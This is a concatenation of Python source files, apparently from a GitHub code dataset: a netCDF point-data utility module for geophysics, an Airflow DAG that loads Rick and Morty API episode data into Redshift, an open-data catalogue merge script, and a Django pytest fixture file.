Handle special case for string arrays via OPeNDAP if self.opendap and (lookup_variable.dtype == 'S1') and (len(lookup_variable.shape) == 2): # Convert 2D byte array into 1D array of unicode strings - needed for OPeNDAP lookup_array = np.array([bytestring[bytestring != b''].tostring().decode('UTF8') for bytestring in lookup_variable[:]]) # OPeNDAP will truncate strings to 64 characters - truncate search strings to match lookup_indices = np.arange(lookup_array.shape[0])[np.in1d(lookup_array, np.array([lookup_value[0:64] for lookup_value in lookup_value_list]))] else: lookup_indices = np.arange(lookup_variable.shape[0])[np.in1d(lookup_variable[:], np.array(lookup_value_list))] logger.debug('lookup_indices: {}'.format(lookup_indices)) lookup_mask = np.in1d(indexing_variable, lookup_indices) logger.debug('lookup_mask: {}'.format(lookup_mask)) return lookup_mask #=============================================================================== # def lookup_mask_generator(self, # lookup_value_list, # lookup_variable_name='line', # indexing_variable_name=None # ): # ''' # Generator to yield mask array based on lookup variable for each of a list of lookup values # ''' # if lookup_variable_name: # indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index' # # try: # indexing_variable = self.netcdf_dataset.variables[indexing_variable_name] # except: # raise BaseException('indexing_variable_name not supplied and cannot be inferred') # # elif indexing_variable_name: # indexing_variable = self.netcdf_dataset.variables[indexing_variable_name] # # if hasattr(indexing_variable, 'lookup'): # # Get lookup variable name from variable attribute # lookup_variable_name = indexing_variable.lookup # elif indexing_variable_name.endswith('_index'): # # Infer lookup variable name from indexing variable name # lookup_variable_name = re.sub('_index$', '', indexing_variable_name) # else: # raise BaseException('lookup_variable_name not supplied and cannot be inferred') # # else: # raise BaseException('Must supply either lookup_variable_name or indexing_variable_name') # # lookup_variable = self.netcdf_dataset.variables[lookup_variable_name] # # for lookup_value in lookup_value_list: # lookup_indices = np.where(lookup_variable[:] == lookup_value)[0] # logger.debug('lookup_indices: {}'.format(lookup_indices)) # # lookup_mask = np.in1d(indexing_variable, lookup_indices) # logger.debug('lookup_mask: {}'.format(lookup_mask)) # yield lookup_mask # #=============================================================================== def get_index_mask(self, lookup_value_list, lookup_variable_name='line', start_index_variable_name=None, count_variable_name=None, point_count=None ): ''' Function to return mask array based on index variable ''' try: lookup_variable = self.netcdf_dataset.variables[lookup_variable_name] except: raise BaseException('Invalid lookup_variable_name') start_index_variable_name = start_index_variable_name or lookup_variable_name + '_start_index' try: start_index_variable = self.netcdf_dataset.variables[start_index_variable_name] except: raise BaseException('start_index_variable_name not supplied and cannot be inferred') count_variable_name = count_variable_name or lookup_variable_name + '_count' try: count_variable = self.netcdf_dataset.variables[count_variable_name] except: raise BaseException('count_variable_name not supplied and cannot be inferred') point_count = point_count or self.netcdf_dataset.dimensions['point'].size lookup_indices = np.arange(lookup_variable.shape[0])[np.in1d(lookup_variable[:], lookup_value_list)] logger.debug('lookup_indices: {}'.format(lookup_indices)) start_indices = start_index_variable[lookup_indices] logger.debug('start_indices: {}'.format(start_indices)) counts = count_variable[lookup_indices] logger.debug('counts: {}'.format(counts)) # Build mask index_mask = np.zeros(shape=(point_count,), dtype='bool') for lookup_index in range(len(lookup_indices)): index_mask[start_indices[lookup_index]:start_indices[lookup_index]+counts[lookup_index]] = True return index_mask def expand_lookup_variable(self, lookup_variable_name='line', indexing_variable_name=None, start_index=0, end_index=0, mask=None, indexing_dimension='point'): ''' Function to expand lookup variables and return an array of the required size ''' if lookup_variable_name: lookup_variable = self.netcdf_dataset.variables[lookup_variable_name] if lookup_variable.shape == (): # Scalar dimension = self.netcdf_dataset.dimensions.get(indexing_dimension) assert dimension, 'Invalid indexing_dimension {} specified'.format(indexing_dimension) # Repeat boolean value across dimension size return np.array([lookup_variable[:]] * dimension.size) indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index' try: indexing_variable = self.netcdf_dataset.variables[indexing_variable_name] except: raise BaseException('indexing_variable_name not supplied and cannot be inferred') elif indexing_variable_name: indexing_variable = self.netcdf_dataset.variables[indexing_variable_name] if hasattr(indexing_variable, 'lookup'): # Get lookup variable name from variable attribute lookup_variable_name = indexing_variable.lookup elif indexing_variable_name.endswith('_index'): # Infer lookup variable name from indexing variable name lookup_variable_name = re.sub('_index$', '', indexing_variable_name) else: raise BaseException('lookup_variable_name not supplied and cannot be inferred') lookup_variable = self.netcdf_dataset.variables[lookup_variable_name] else: raise BaseException('Must supply either lookup_variable_name or indexing_variable_name') end_index = end_index or indexing_variable.shape[0] # Usually this will be the point count index_range = end_index - start_index if mask is None: # No mask defined - take all points in range subset_mask = np.ones(shape=(index_range,), dtype='bool') else: subset_mask = mask[start_index:end_index] lookup_variable.set_auto_mask(False) indexing_variable.set_auto_mask(False) result_array = lookup_variable[:][indexing_variable[start_index:end_index][subset_mask]] # Need to index numpy array, not netCDF variable # Convert 2D byte array into 1D array of unicode strings - needed for OPeNDAP if result_array.dtype == 'S1': result_array = np.array([bytestring[bytestring != b''].tostring().decode('UTF8') for bytestring in result_array]) return result_array def chunk_point_data_generator(self, start_index=0, end_index=0, field_list=None, mask=None, yield_variable_attributes_first=False): ''' Generator to optionally yield variable attributes followed by all point data for the specified point index range Used to retrieve data as chunks for outputting as point-wise lists of lists @param start_index: start point index of range to read @param end_index: end point index of range to read. Defaults to number of points @param field_list: Optional list of field names to read. Default is None for all variables @param mask: Optional Boolean mask array to subset points @param yield_variable_attributes_first: Boolean flag to determine whether variable attribute dict is yielded first. Defaults to False @yield variable_attributes: dict of netCDF variable attributes. Optionally the first item yielded if yield_variable_attributes_first is True @yield point_value_list: List of single values for 1D variables or sub-lists for 2D variables for a single point ''' # Start of point_data_generator function end_index = end_index or self.point_count index_range = end_index - start_index if mask is None: # No mask defined - take all points in range subset_mask = np.ones(shape=(index_range,), dtype='bool') else: subset_mask = mask[start_index:end_index] index_range = np.count_nonzero(subset_mask) # If no points to retrieve, don't read anything if not index_range: logger.debug('No points to retrieve for point indices {}-{}: All masked out'.format(start_index, end_index-1)) return # Generate full field list if None provided if not field_list: field_list = [variable.name for variable in self.netcdf_dataset.variables.values() if (not len(variable.dimensions) # Scalar variable or variable.dimensions[0] == 'point' # Variable is of point dimension or (variable.dimensions[0] + '_index' in self.netcdf_dataset.variables.keys() # Variable has an index variable and len(self.netcdf_dataset.variables[variable.dimensions[0] + '_index'].dimensions) # index variable is not a scalar and self.netcdf_dataset.variables[variable.dimensions[0] + '_index'].dimensions[0] == 'point' # index variable is of point dimension ) ) and not variable.name.endswith('_index') and not hasattr(variable, 'lookup') # Variable is not an index variable and not variable.name in NetCDFUtils.CRS_VARIABLE_NAMES and not re.match('ga_.+_metadata', variable.name) # Not an excluded variable ] logger.debug('field_list: {}'.format(field_list)) variable_attributes = OrderedDict() memory_cache = OrderedDict() for variable_name in field_list: variable = self.netcdf_dataset.variables.get(variable_name) if variable is None: logger.warning('Variable {} does not exist. Skipping.'.format(variable_name)) continue #logger.debug('variable_name: {}'.format(variable_name)) # Scalar variable if len(variable.shape) == 0: # Skip CRS variable if variable_name in NetCDFUtils.CRS_VARIABLE_NAMES or re.match('ga_.+_metadata', variable_name): continue # Repeat scalar value for each point data_array = variable[:] memory_cache[variable_name] = np.array([data_array] * index_range) else: # nD array variable if (variable.dimensions[0] != 'point'): # Variable is NOT of point dimension - must be lookup memory_cache[variable_name] = self.expand_lookup_variable(lookup_variable_name=variable_name, start_index=start_index, end_index=end_index, mask=mask) else: # 'point' is in variable.dimensions - "normal" variable data_array = variable[start_index:end_index] # Include fill_values if array is masked if type(data_array) == np.ma.core.MaskedArray: data_array = data_array.data memory_cache[variable_name] = data_array[subset_mask] if yield_variable_attributes_first: variable_attributes[variable_name] = dict(variable.__dict__) logger.debug('variable_attributes: {}'.format(pformat(variable_attributes))) logger.debug('memory_cache: {}'.format(pformat(memory_cache))) if yield_variable_attributes_first: yield variable_attributes for index in range(index_range): point_value_list = [] for variable_name, variable in iter(memory_cache.items()): data_array = variable[index] # Convert array to string if required if type(data_array) == np.ndarray and data_array.dtype == object: data_array = str(data_array) point_value_list.append(data_array) yield point_value_list logger.debug('{} points read for point indices {}-{}'.format(index_range, start_index, end_index-1)) def all_point_data_generator(self, field_list=None, mask=None, read_chunk_size=None, yield_variable_attributes_first=True): ''' Generator to yield variable attributes followed by lists of values for all points @param field_list: Optional list of field names to read. Default is None for all variables @param mask: Optional Boolean mask array to subset points @param read_chunk_size: Number of points to read from the netCDF per chunk (for greater efficiency than single point reads) @param yield_variable_attributes_first: Boolean flag to determine whether variable attribute dict is yielded first. Defaults to True @yield variable_attributes: dict of netCDF variable attributes. Optionally the first item yielded if yield_variable_attributes_first is True @yield point_value_list: List of single values for 1D variables or sub-lists for 2D variables for a single point ''' read_chunk_size = read_chunk_size or DEFAULT_READ_CHUNK_SIZE # Process all chunks point_count = 0 for chunk_index in range(self.point_count // read_chunk_size + 1): for line in self.chunk_point_data_generator(field_list=field_list, start_index=chunk_index*read_chunk_size, end_index=min((chunk_index+1)*read_chunk_size, self.point_count ), mask=mask, yield_variable_attributes_first=yield_variable_attributes_first ): if not yield_variable_attributes_first: point_count += 1 yield_variable_attributes_first = False # Only yield variable attributes from the first chunk #logger.debug('line: {}'.format(line)) yield line if POINT_LIMIT and (point_count >= POINT_LIMIT): break if POINT_LIMIT and (point_count >= POINT_LIMIT): break logger.debug('{} points read from netCDF file {}'.format(point_count, self.nc_path)) def get_xy_coord_values(self): ''' Function to return a full in-memory coordinate array from source dataset ''' logger.debug('Reading xy coordinates from source dataset') xycoord_values = np.zeros(shape=(len(self.x_variable), 2), dtype=self.x_variable.dtype) self.fetch_array(self.x_variable, xycoord_values[:,0]) self.fetch_array(self.y_variable, xycoord_values[:,1]) # Deal with netCDF4 Datasets that have had set_auto_mask(False) called if hasattr(self.x_variable, '_FillValue'): xycoord_values[:,0][xycoord_values[:,0] == self.x_variable._FillValue] = np.nan if hasattr(self.y_variable, '_FillValue'): xycoord_values[:,1][xycoord_values[:,1] == self.y_variable._FillValue] = np.nan return xycoord_values @property def xycoords(self): ''' Property getter function to return pointwise array of XY coordinates The order of priority for retrieval is memory, memcached, disk cache then dataset. ''' xycoords = None # assert np.allclose(arr, arr_down) if self.enable_memory_cache and self._xycoords is not None: #logger.debug('Returning memory cached coordinates') return self._xycoords elif self.memcached_connection is not None: coord_cache_key = self.cache_basename + '_xycoords' logger.debug("hit xycoords propery code") logger.debug(self.memcached_connection) xycoords = self.memcached_connection.get(coord_cache_key) if xycoords is not None: # self.memcached_connection.get(self.cache_path) is True: logger.debug('memcached key found at {}'.format(coord_cache_key)) #logger.debug('xycoords: {}'.format(xycoords)) else: xycoords = self.get_xy_coord_values() logger.debug("key not found at {}. adding key and value".format(coord_cache_key)) self.memcached_connection.add(coord_cache_key, xycoords) elif self.enable_disk_cache: if os.path.isfile(self.cache_path): # Cached coordinate file exists - read it cache_dataset = netCDF4.Dataset(self.cache_path, 'r') #assert cache_dataset.source == self.nc_path, 'Source mismatch: cache {} vs. dataset {}'.format(cache_dataset.source, self.nc_path) if 'xycoords' in cache_dataset.variables.keys(): xycoords = cache_dataset.variables['xycoords'][:] logger.debug('Read {} coordinates from cache file {}'.format(xycoords.shape[0], self.cache_path)) else: logger.debug('Unable to read xycoords variable from netCDF cache file {}'.format(self.cache_path)) cache_dataset.close() else: logger.debug('NetCDF cache file {} does not exist'.format(self.cache_path)) if xycoords is None: xycoords = self.get_xy_coord_values() # read coords from source file os.makedirs(os.path.dirname(self.cache_path), exist_ok=True) if os.path.isfile(self.cache_path): cache_dataset = netCDF4.Dataset(self.cache_path, 'r+') else: cache_dataset = netCDF4.Dataset(self.cache_path, 'w') if not hasattr(cache_dataset, 'source'): cache_dataset.source = self.nc_path #assert cache_dataset.source == self.nc_path, 'Source mismatch: cache {} vs. dataset {}'.format(cache_dataset.source, self.nc_path) if 'point' not in cache_dataset.dimensions.keys(): cache_dataset.createDimension(dimname='point', size=xycoords.shape[0]) if 'xy' not in cache_dataset.dimensions.keys(): cache_dataset.createDimension(dimname='xy', size=xycoords.shape[1]) if 'xycoords' not in cache_dataset.variables.keys(): cache_dataset.createVariable('xycoords', xycoords.dtype, dimensions=['point', 'xy'], **self.CACHE_VARIABLE_PARAMETERS ) cache_dataset.variables['xycoords'][:] = xycoords # Write coords to cache file cache_dataset.close() logger.debug('Saved {} coordinates to cache file {}'.format(xycoords.shape[0], self.cache_path)) else: # No caching - read coords from source file xycoords = self.get_xy_coord_values() if self.enable_memory_cache: self._xycoords = xycoords return xycoords @property def point_variables(self): ''' Property getter function to return point_variables as required ''' if not self._point_variables: logger.debug('Setting point_variables property') self._point_variables = list([var_name for var_name in self.netcdf_dataset.variables.keys() if 'point' in self.netcdf_dataset.variables[var_name].dimensions and var_name not in ['latitude', 'longitude', 'easting', 'northing', 'point', 'fiducial', 'flag_linetype'] ]) return self._point_variables @property def data_variable_list(self): ''' Property getter function to return data_variable_list as required ''' if not self._data_variable_list: logger.debug('Setting data_variable_list property') self._data_variable_list = [key for key, value in self.netcdf_dataset.variables.items() if 'point' in value.dimensions] return self._data_variable_list @property def kdtree(self): ''' Property getter function to return data_variable_list as required ''' if not self._kdtree: logger.debug('Indexing full dataset with {} points into KDTree...'.format(self.xycoords.shape[0])) self._kdtree = cKDTree(data=self.xycoords, balanced_tree=False) logger.debug('Finished indexing full dataset into KDTree.') return self._kdtree def copy(self, nc_out_path, datatype_map_dict={}, variable_options_dict={}, dim_range_dict={}, dim_mask_dict={}, nc_format=None, limit_dim_size=False, var_list=[], empty_var_list=[], to_crs=None ): ''' Function to copy a netCDF dataset to another one with potential changes to size, format, variable creation options and datatypes. @param nc_out_path: path to netCDF output file @param to_crs: WKT of destination CRS ''' if var_list: expanded_var_list = list(set( var_list + NetCDFUtils.X_DIM_VARIABLE_NAMES + NetCDFUtils.Y_DIM_VARIABLE_NAMES + NetCDFUtils.CRS_VARIABLE_NAMES + ['line', 'line_index'] # Always include line numbers (This really should be in an overridden function in NetCDFLineUtils) )) else: expanded_var_list = var_list # Call inherited NetCDFUtils method super().copy( nc_out_path, datatype_map_dict=datatype_map_dict, variable_options_dict=variable_options_dict, dim_range_dict=dim_range_dict, dim_mask_dict=dim_mask_dict, nc_format=nc_format, limit_dim_size=limit_dim_size, var_list=expanded_var_list, empty_var_list=empty_var_list, ) # Finish up if no reprojection required dest_srs = get_spatial_ref_from_wkt(to_crs) if not to_crs or dest_srs.IsSame(get_spatial_ref_from_wkt(self.wkt)): logger.debug('No reprojection required for dataset {}'.format(nc_out_path)) return try: logger.debug('Re-opening new dataset {}'.format(nc_out_path)) new_dataset = netCDF4.Dataset(nc_out_path, 'r+') new_ncpu = NetCDFPointUtils(new_dataset, debug=self.debug) logger.debug('Reprojecting {} coordinates in new dataset'.format(len(new_ncpu.x_variable))) #TODO: Check coordinate variable data type if changing between degrees & metres new_ncpu._xycoords = transform_coords(new_ncpu.xycoords, self.wkt, to_crs) new_ncpu.x_variable[:] = new_ncpu._xycoords[:,0] new_ncpu.y_variable[:] = new_ncpu._xycoords[:,1] crs_variable_name, crs_variable_attributes = self.get_crs_attributes(to_crs) logger.debug('Setting {} variable attributes'.format(crs_variable_name)) # Delete existing crs variable attributes for key in new_ncpu.crs_variable.__dict__.keys(): if not key.startswith('_'): delattr(new_ncpu.crs_variable, key) try: delattr(new_ncpu.x_variable, key) delattr(new_ncpu.y_variable, key) except: pass # Set new crs variable attributes new_ncpu.crs_variable.setncatts(crs_variable_attributes) new_ncpu.x_variable.setncatts(crs_variable_attributes) new_ncpu.y_variable.setncatts(crs_variable_attributes) # Rename variables if switching between projected & unprojected if crs_variable_name != new_ncpu.crs_variable.name: logger.debug('Renaming {} variable to {}'.format(new_ncpu.crs_variable.name, crs_variable_name)) new_dataset.renameVariable(new_ncpu.crs_variable.name, crs_variable_name) if crs_variable_name == 'crs': # Geodetic xy_varnames = ('longitude', 'latitude') units = dest_srs.GetAngularUnitsName() + 's' # degrees elif crs_variable_name in ['transverse_mercator', "albers_conical_equal_area"]: # Projected xy_varnames = ('x', 'y') units = units = dest_srs.GetLinearUnitsName() + 's' # metres else: raise BaseException('Unhandled crs variable name "{}"'.format(crs_variable_name)) logger.debug('Renaming {} & {} variables to {} & {}'.format(new_ncpu.x_variable.name, new_ncpu.y_variable.name, *xy_varnames )) new_dataset.renameVariable(new_ncpu.x_variable.name, xy_varnames[0]) new_ncpu.x_variable.units = units new_ncpu.x_variable.long_name = xy_varnames[0] new_dataset.renameVariable(new_ncpu.y_variable.name, xy_varnames[1]) new_ncpu.y_variable.units = units new_ncpu.y_variable.long_name = xy_varnames[1] finally: new_dataset.close() def set_global_attributes(self, compute_shape=False, clockwise_polygon_orient=False): '''\ Function to set global geometric metadata attributes in netCDF file N.B: This will fail if dataset is not writable ''' try: metadata_srs = get_spatial_ref_from_wkt(METADATA_CRS) assert metadata_srs.IsGeographic(), 'Unable to set geodetic parameters for this dataset' #=================================================================== # # Reopen as writable dataset # filepath = self.netcdf_dataset.filepath() # self.netcdf_dataset.close() # self.netcdf_dataset = netCDF4.Dataset(filepath, 'r+') #=================================================================== logger.debug('Setting global geometric metadata attributes in netCDF point dataset with {} points'.format(self.netcdf_dataset.dimensions['point'].size)) attribute_dict = dict(zip(['geospatial_lon_min', 'geospatial_lat_min', 'geospatial_lon_max', 'geospatial_lat_max'], get_reprojected_bounds(self.bounds, self.wkt, METADATA_CRS) ) ) attribute_dict['geospatial_lon_units'] = 'degree_east' attribute_dict['geospatial_lat_units'] = 'degree_north' attribute_dict['geospatial_bounds_crs'] = metadata_srs.ExportToPrettyWkt() if compute_shape: try: logger.debug('Computing concave hull') attribute_dict['geospatial_bounds'] = shapely.wkt.dumps( self.get_concave_hull( to_wkt=METADATA_CRS, clockwise_polygon_orient=clockwise_polygon_orient ), rounding_precision=SHAPE_ORDINATE_DECIMAL_PLACES) except Exception as e: logger.warning('Unable to compute concave hull shape: {}'.format(e)) try: self.netcdf_dataset.geospatial_bounds = shapely.wkt.dumps(asPolygon([ [attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_min']], [attribute_dict['geospatial_lon_max'], attribute_dict['geospatial_lat_min']], [attribute_dict['geospatial_lon_max'], attribute_dict['geospatial_lat_max']], [attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_max']], [attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_min']], ])) except: pass logger.debug('attribute_dict = {}'.format(pformat(attribute_dict))) logger.debug('Writing global attributes to netCDF file'.format(self.netcdf_dataset.filepath())) for key, value in attribute_dict.items(): setattr(self.netcdf_dataset, key, value) logger.debug('Finished setting global geometric metadata attributes in netCDF point dataset') except: logger.error('Unable to set geometric metadata attributes in netCDF point dataset') raise def set_variable_actual_range_attribute(self): '''\ Function to set ACDD actual_range attribute in all non-index point-dimensioned variables N.B: Will fail if dataset is not writable ''' self.netcdf_dataset.set_auto_mask(True) try: for variable_name, variable in self.netcdf_dataset.variables.items(): # Skip all variables not of point dimensionality if 'point' not in variable.dimensions: continue # Skip index variables if re.search('_index$', variable_name): continue try: variable.actual_range = np.array( [np.nanmin(variable[:]), np.nanmax(variable[:])], dtype=variable.dtype) logger.debug('{}.actual_range = {}'.format(variable_name, variable.actual_range)) except: logger.warning('Unable to compute actual_range value for point variable {}'.format(variable_name)) except: logger.error('Unable to set variable actual_range metadata attributes in netCDF point dataset') raise def main(debug=True): ''' Main function for quick and dirty testing ''' netcdf_path = sys.argv[1] netcdf_dataset = netCDF4.Dataset(netcdf_path, 'r') ncpu = NetCDFPointUtils(netcdf_dataset, debug=debug) # Enable debug output here # Create mask for last ten points mask = np.zeros(shape=(ncpu.point_count,), dtype='bool') mask[-10:] = True # Set list of fields to read field_list = None #field_list = ['latitude', 'longitude', 'obsno', 'reliab'] point_data_generator = ncpu.all_point_data_generator(field_list, mask) # Retrieve point variable attributes first variable_attributes = next(point_data_generator) logger.info('variable_attributes: {}'.format(variable_attributes)) # Use long names instead of variable names where they exist field_names = [variable_attributes[variable_name].get('long_name') or variable_name for variable_name in variable_attributes.keys()] logger.info('field_names: {}'.format(field_names)) for point_data in point_data_generator: #logger.debug('point_data: {}'.format(pformat(point_data))) result_dict = dict(zip(field_names, point_data)) logger.info('result_dict: {}'.format(result_dict)) if __name__ == '__main__': # Setup logging handlers if required console_handler = logging.StreamHandler(sys.stdout) #console_handler.setLevel(logging.INFO) console_handler.setLevel(logging.DEBUG) console_formatter = logging.Formatter('%(message)s') console_handler.setFormatter(console_formatter) if not logger.handlers: # Set handler for root logger to standard output logger.addHandler(console_handler) logger.debug('Logging handlers set up for logger {}'.format(logger.name)) ncu_logger = logging.getLogger('geophys_utils._netcdf_utils') if not ncu_logger.handlers: ncu_logger.addHandler(console_handler) logger.debug('Logging handlers set up for {}'.format(ncu_logger.name)) main()
GeoscienceAustralia/geophys_utils
geophys_utils/_netcdf_point_utils.py
_netcdf_point_utils.py
py
66,225
python
en
code
22
github-code
6
31106779539
from datetime import datetime import requests import pandas as pd from airflow import DAG from airflow.operators.python_operator import PythonOperator from airflow.operators.postgres_operator import PostgresOperator from airflow.providers.postgres.hooks.postgres import PostgresHook from psycopg2.extras import execute_values import time default_args = { 'owner': 'JORGE', 'start_date': datetime(2023, 5, 18), 'schedule_interval': '0 0 * * *', } def obtener_datos(): url = 'https://rickandmortyapi.com/api/episode' datos_obtenidos = [] while url is not None: response = requests.get(url) data = response.json() datos_obtenidos += data['results'] url = data['info']['next'] df_episodios = pd.DataFrame(datos_obtenidos) df_episodios.to_dict('records') df_episodios = df_episodios.drop(columns=['characters','url']) df_episodios.columns = ["id","nombre_episodio", "fecha_aire", "episodio","fecha_creacion"] hook = PostgresHook(postgres_conn_id='amazon_redshift') conn = hook.get_conn() cur = conn.cursor() tabla = "episodio" columns = ['id', 'nombre_episodio', 'fecha_aire', 'episodio', 'fecha_creacion'] values = [tuple(x) for x in df_episodios.to_numpy()] insert_sql = f"INSERT INTO {tabla} ({', '.join(columns)}) VALUES %s" cur.execute("BEGIN") execute_values(cur, insert_sql, values) conn.commit() cur.close() conn.close() with DAG( default_args=default_args, dag_id='carga_de_episodios', description='Obtener datos de API, transformar y cargar en Redshift', ) as dag: crear_tabla = PostgresOperator( task_id='crear_tabla_episodio', postgres_conn_id='amazon_redshift', sql=""" DROP TABLE IF EXISTS jorgeflores2311233_coderhouse.episodio; CREATE TABLE jorgeflores2311233_coderhouse.episodio( id INTEGER PRIMARY KEY, nombre_episodio VARCHAR(250), fecha_aire VARCHAR(250), episodio VARCHAR(250), fecha_creacion DATETIME ); """ ) obtener_datos_episodios = PythonOperator( task_id='obtener_datos', python_callable=obtener_datos ) crear_tabla >> obtener_datos_episodios
jorge-flores-py/rick-morty
dags/dag_carga_automatica_episodios.py
dag_carga_automatica_episodios.py
py
2,329
python
es
code
0
github-code
6
72052702908
#!/usr/bin/env python # coding: utf-8 """ This script collects all the data in orgs and sources folders and merge them in a single json file. """ import json, pathlib, os, sys ### ENVIRONMENTAL VARIABLES # environmental variables can be set in order to override default values # NOTE: you can use relative or absolute paths, with or without a separator at the end of folder names # the folder that contains sources json files # default: './sources' env_sources = 'OPENDATA_SOURCES_DIR' # the folder containing the organization details # default: './orgs' env_organizations = 'OPENDATA_ORGANIZATIONS_DIR' # the filename that will store all results (include extension) # default: './dist/index.json' env_dist_filename = 'OPENDATA_DIST_FILENAME' # the filename that will store nested results (include extension) # default: './dist/nested/index.json' env_nested_filename = 'OPENDATA_NESTED_FILENAME' # shall the script override the data? # default: True env_allow_override = 'OPENDATA_CAN_OVERRIDE' # It may be desiderable to remove the owner_org key from the source since it is implicit. # This saves a few bytes in the final json file. If you want to keep the owner_org key # feel free to set the variable to True # default: False env_keep_owner = 'OPENDATA_KEEP_OWNER' # in case you want just to output to the console (i.e. if you want to pipe the results into a parser) # default: False env_to_stdout = 'OPENDATA_USE_STDOUT' ### DEFAULT SETTINGS falsy_strings = ('no', 'false', 'never', 'n', 'f', 'falso', 'mai') # add other strings if necessary (?) empty = ('', None) sources_dir = os.environ[env_sources] if (env_sources in os.environ) and (os.environ[env_sources] not in empty) else pathlib.Path('.', 'sources') orgs_dir = os.environ[env_organizations] if (env_organizations in os.environ) and (os.environ[env_organizations] not in empty) else pathlib.Path('.', 'orgs') dist_filename = os.environ[env_dist_filename] if (env_dist_filename in os.environ) and (os.environ[env_dist_filename] not in empty) else pathlib.Path('.', 'dist/index.json') nested_filename = os.environ[env_nested_filename] if (env_nested_filename in os.environ) and (os.environ[env_nested_filename] not in empty) else pathlib.Path('.', 'dist/nested/index.json') override = (os.environ[env_allow_override].lower() not in falsy_strings) if (env_allow_override in os.environ) and (os.environ[env_allow_override] not in empty) else True keep_owner = (os.environ[env_keep_owner].lower() not in falsy_strings) if (env_keep_owner in os.environ) and (os.environ[env_keep_owner] not in empty) else False to_stdout = (os.environ[env_to_stdout].lower() not in falsy_strings) if (env_to_stdout in os.environ) and (os.environ[env_to_stdout] not in empty) else False # A dictionary to guide in the classification of the organizations. # There are two main branches, "nazionale" (national) and "locale" (local). # Every branch has a inner dictionary. The inner dictionary keys are the first word in org.title whereas # the dictionary values are the keys to be used to identify the type of organization in json output. # You can customize the values returned; the key "*" is used as a catch-all alternative if the first word # in org.title is not present in the dictionary's branch. classification = { 'nazionale': { 'ministero': 'ministero', '*': 'altro' }, 'locale': { 'citta': 'citta metropolitana', 'comune': 'comune', 'provincia': 'provincia', 'regione': 'regione', 'universita': 'universita', '*': 'altro' } } ### UTILITIES def classify(organization): """ the function checks the first word in the title of the organization and returns a list of keys to be used to classify it. """ first_word = organization['name'].split('-')[0] category = 'locale' if 'region' in organization.keys() else 'nazionale' result = [category] if category == 'locale': result.append(organization['region']) if first_word in classification[category].keys(): result.append(classification[category][first_word]) else: result.append(classification[category]['*']) # first word not recognized. return result def populate_dict(keys_list, dictionary, organization, source): """ recursive function that takes a list of keys to be added to a dict of dicts (the dictionary argument). If the list is empty, it returns the organization argument (the leaf) otherwise it returns a dictionary created from the nested keys (the branches). example: -------- keys_list = ['a', 'b', 'c'] dictionary = {'other':{'nested'}, 'a':{'foo':'bar'}} organization = {"whatever": "value", "you":"want"} > populate_dict(keys_list, dictionary, organization) > {'other':{'nested'}, 'a':{'foo':'bar', 'b':{'c':{"whatever": "value", "you":"want"}}}} """ if len(keys_list) == 0: # time to save the new source has_organization = False if not keep_owner: source.pop('owner_org', None) # check if organization is already present for org in dictionary: if org['name'] == organization['name']: # the organization already esists organization = org # if the organization is already in the dictionary the 'sources' key has been set # so it is not necessary to check for its existence organization['sources'].append(source) has_organization = True break if not has_organization: # no organization found or dictionary is empty organization['sources'] = [source] dictionary.append(organization) return dictionary key = keys_list.pop(0) if key not in dictionary.keys(): if len(keys_list) == 0: dictionary[key] = populate_dict(keys_list, [], organization, source) else: dictionary[key] = populate_dict(keys_list, {}, organization, source) else: dictionary[key] = populate_dict(keys_list, dictionary[key], organization, source) return dictionary ### PARSER def parse(): """ the main script """ dist_all = {} dist_nested = {} for source in pathlib.Path(sources_dir).glob('*.json'): with source.open('r') as source_file: source_content = json.load(source_file) if "config" in source_content: source_content["config"] = json.loads(source_content["config"]) owner = source_content['owner_org'] try: with pathlib.Path(orgs_dir, owner+'.json').open('r') as organization: org_content = json.load(organization) category = classify(org_content) dist_nested = populate_dict(category, dist_nested, org_content, source_content) dist_all[owner] = dist_all.get(owner, dict(org_content, sources=[])) dist_all[owner]["sources"].append({ k:source_content[k] for k in source_content if keep_owner or source_content[k] != 'owner_org' }) except FileNotFoundError: print(f"ERROR: file {pathlib.Path(orgs_dir, owner+'.json')} not found or not readable.", file=sys.stderr) exit(2) if not dist_nested or not dist_all: print(f"WARNING: no sources found. Is {pathlib.Path(sources_dir)} the correct folder?", file=sys.stderr) if to_stdout: print(json.dumps(dist_all.values(), sort_keys=True, indent=4)) if override or not os.path.exists(dist_filename): with open(dist_filename, 'w') as output_file: json.dump(list(dist_all.values()), output_file) else: print("ERROR: output file exists and I'm not allowed to overwrite it.", file=sys.stderr) if override or not os.path.exists(nested_filename): with open(nested_filename, 'w') as output_file: json.dump(dist_nested, output_file) else: print("ERROR: output file exists and I'm not allowed to overwrite it.", file=sys.stderr) ### THE SCRIPT if __name__ == '__main__': parse()
italia/public-opendata-sources
export_all.py
export_all.py
py
8,264
python
en
code
17
github-code
6
2078438087
# -*- coding: utf-8 -*- from django_webtest import DjangoTestApp, WebTestMixin import pytest from testapp.articles.factories import AuthorFactory, ArticleFactory, TeamFactory @pytest.fixture(scope='function') def app(request): wtm = WebTestMixin() wtm._patch_settings() wtm._disable_csrf_checks() request.addfinalizer(wtm._unpatch_settings) return DjangoTestApp() @pytest.fixture(scope='function') def data(request): teams = [ TeamFactory() for x in range(0, 2) ] authors = [ AuthorFactory(team=team) for team in teams for x in range(0, 5) ] articles = [ ArticleFactory(author=author) for author in authors for x in range(0, 10) ] return { 'teams': teams, 'authors': authors, 'articles': articles, }
odoku/django-searchview
tests/conftest.py
conftest.py
py
846
python
en
code
0
github-code
6
16314867701
